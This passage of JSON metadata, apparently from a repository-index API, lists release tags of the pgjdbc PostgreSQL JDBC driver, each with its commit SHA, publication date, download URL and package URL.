"tag","published_at":"2024-03-13T18:57:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.2-rc2/manifests"},{"name":"REL42.5.6","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:48:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6/manifests"},{"name":"REL42.5.6-rc1","sha":"b9953dc45e1607ec1db292f59768f857b75386ef","kind":"tag","published_at":"2024-03-13T18:46:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.6-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.6-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.6-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.6-rc1/manifests"},{"name":"REL42.4.5","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-13T18:39:31.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5/manifests"},{"name":"REL42.3.10","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:33:19.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10/manifests"},{"name":"REL42.3.10-rc1","sha":"b0326938dd31d995aedaaca830d974ec05881d75","kind":"tag","published_at":"2024-03-13T18:30:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.10-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.10-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.10-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.10-rc1/manifests"},{"name":"REL42.2.29","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:27:39.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29/manifests"},{"name":"REL42.2.29-rc1","sha":"d8fadb386f95cd6ab08f9c59fde3ca4b8af04eac","kind":"tag","published_at":"2024-03-13T18:21:48.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.29-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.29-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.29-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.29-rc1/manifests"},{"name":"REL42.4.5-rc1","sha":"a4a957ac0e9ee93cdae2fd51f782cda3b7be711b","kind":"tag","published_at":"2024-03-08T14:02:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.5-rc1/manifests"},{"name":"REL42.2.28","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:47:40.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28/manifests"},{"name":"REL42.2.28-rc1","sha":"990d63f6be401ab40de5eb303a75924c9e71903c","kind":"tag","published_at":"2024-02-21T00:45:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.2.28-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.2.28-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.2.28-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.2.28-rc1/manifests"},{"name":"REL42.3.9","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9/manifests"},{"name":"REL42.3.9-rc1","sha":"d93c74127f5aebda2baa8fcefed4f0b4dfe81d95","kind":"tag","published_at":"2024-02-21T00:42:10.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.3.9-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.3.9-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.3.9-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.3.9-rc1/manifests"},{"name":"REL42.4.4","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:52.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4/manifests"},{"name":"REL42.4.4-rc1","sha":"fe002b31f2c7dcf7e2fe75fe7fd18df4e4503abf","kind":"tag","published_at":"2024-02-21T00:37:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.4.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.4.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.4.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.4.4-rc1/manifests"},{"name":"REL42.5.5","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:25:02.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5/manifests"},{"name":"REL42.5.5-rc1","sha":"475e3e2af3033c666fc1c0015159b35455118ae5","kind":"tag","published_at":"2024-02-21T00:24:27.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.5-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.5-rc1/manifests"},{"name":"REL42.6.1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:16:34.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1/manifests"},{"name":"REL42.6.1-rc1","sha":"d368b1cc5fbfc9750151f87d78e12db97e13af0e","kind":"tag","published_at":"2024-02-21T00:15:35.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.1-rc1/manifests"},{"name":"REL42.7.2-rc5","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T23:53:58.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc5","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc5/manifests"},{"name":"REL42.7.2-rc4","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T16:35:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc4/manifests"},{"name":"REL42.7.2-rc3","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:49:24.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc3/manifests"},{"name":"REL42.7.2-rc2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:25:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc2/manifests"},{"name":"REL42.7.2-rc1","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"tag","published_at":"2024-02-20T15:10:07.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2-rc1/manifests"},{"name":"REL42.7.2","sha":"06abfb78a627277a580d4df825f210e96a4e14ee","kind":"commit","published_at":"2024-02-20T15:01:14.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.2/manifests"},{"name":"REL42.7.1","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:32:17.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1/manifests"},{"name":"REL42.7.1-rc2","sha":"27bbccfeb73eec105057e53ae6068faf0e6f40b2","kind":"tag","published_at":"2023-12-06T15:26:56.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc2/manifests"},{"name":"REL42.7.1-rc1","sha":"bb577e0a7afb0df74a9a00d43896ada2c1dd0dfc","kind":"tag","published_at":"2023-12-06T15:08:37.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.1-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.1-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.1-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.1-rc1/manifests"},{"name":"REL42.7.0","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T19:04:47.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0/manifests"},{"name":"REL42.7.0-rc3","sha":"1566eed0caeb26108f9df1d28255538767b7676f","kind":"tag","published_at":"2023-11-20T18:11:04.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.7.0-rc3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.7.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.7.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.7.0-rc3/manifests"},{"name":"REL42.6.0","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:10:29.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0/manifests"},{"name":"REL42.6.0-rc1","sha":"d6a0cc2babc5e5a4cef0a8eafd1b36198d8e3873","kind":"tag","published_at":"2023-03-17T22:07:45.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.6.0-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.6.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.6.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.6.0-rc1/manifests"},{"name":"REL42.5.4","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:41:18.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4/manifests"},{"name":"REL42.5.4-rc1","sha":"051ae1b75a08a695ce1f96bcea7ce7ca49f798c9","kind":"tag","published_at":"2023-02-16T14:26:33.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.4-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.4-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.4-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.4-rc1/manifests"},{"name":"REL42.5.3","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:23:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3/manifests"},{"name":"REL42.5.3-rc2","sha":"976b27b5efce6486cc9d6330561184e875dbde53","kind":"tag","published_at":"2023-02-03T15:19:38.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc2/manifests"},{"name":"REL42.5.3-rc1","sha":"d2f77a26815e7994db7ac4d816d29d6d7395418d","kind":"tag","published_at":"2023-02-03T15:07:22.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.3-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.3-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.3-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.3-rc1/manifests"},{"name":"REL42.5.2-rc2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"tag","published_at":"2023-02-01T13:20:32.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc2/manifests"},{"name":"REL42.5.2","sha":"50dc6bc28f3da47d392d824887e92e51012f7fbc","kind":"commit","published_at":"2023-01-31T20:40:11.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2/manifests"},{"name":"REL42.5.2-rc1","sha":"e7239c1f8e1f8757fbe3b50ba4c967ea85cdf12e","kind":"tag","published_at":"2023-01-13T20:43:25.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.2-rc1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.2-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.2-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.2-rc1/manifests"},{"name":"REL42.5.1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:36:55.000Z","download_url":"https://codeload.github.com/pgjdbc/pgjdbc/tar.gz/REL42.5.1","html_url":"https://github.com/pgjdbc/pgjdbc/releases/tag/REL42.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/pgjdbc/pgjdbc@REL42.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/pgjdbc%2Fpgjdbc/tags/REL42.5.1/manifests"},{"name":"REL42.5.1-rc1","sha":"9008dc9aade6dbfe4efafcd6872ebc55f4699cf5","kind":"tag","published_at":"2022-11-23T14:32:50.000Z","download_url":"https://codeload.github.com/pgjdbc/pgj